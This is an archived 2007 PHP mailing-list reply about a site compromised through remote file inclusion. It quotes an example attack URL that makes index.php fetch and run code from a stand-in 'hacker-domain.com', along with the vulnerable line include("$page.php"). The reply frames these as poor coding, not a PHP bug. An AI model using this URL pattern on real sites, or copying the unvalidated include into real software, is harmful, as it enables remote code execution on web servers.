Re: Re: Question on virus/worms
| From: | Stut | Date: | Fri, 02 Mar 2007 19:23:16 +0000 |
| Subject: | Re: Re: Question on virus/worms | ||
| References: | 1 2 3 | Groups: | php.general php.windows |
| Request: | Send a blank email to php-windows+get-27538@lists.php.net to get a copy of this message | ||
Seak, Teng-Fong wrote:
You mean to say that you're not validating what you're getting from the user? Frankly you deserve everything you get. This is *not* a "security loophole", it *is* a poorly written script.But after I've spent some time reading the log files, I've finallyfound out how the hackers managed to achieve worm infiltration.Actually, they're using an URL like this:http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?And the some-worm-file.txt file contains some PHP code, while myindex.php contains this instruction: include("$page.php");This is enough to make infiltration possible! IMO, this instructionis supposed to be used like this, isn't it? So this is obviously a PHP security loophole and I don't see how the "poorly written scripts" can help anything unless a totally rewrite! And there's no "poor server security" that I can see.
Read the manual, specifically the error_reporting part. You can turn the display of these messages off.I've installed PHP5 and the problem seems fixed. However, PHPwrites out where the problem occurs! Indeed, the hacker could read a line like this: Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line XI don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How canI stop that?
It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+) introduces the ability to turn off the ability to prevent this issue, but it's still badly written code. Stop blaming the tool, start blaming the mirror image and start learning how to code defensively. -StutBy the way, I know there're still a lot of servers out there stillusing PHP4. Is this vulnerability a known bug? At least, I'm not aware of that before!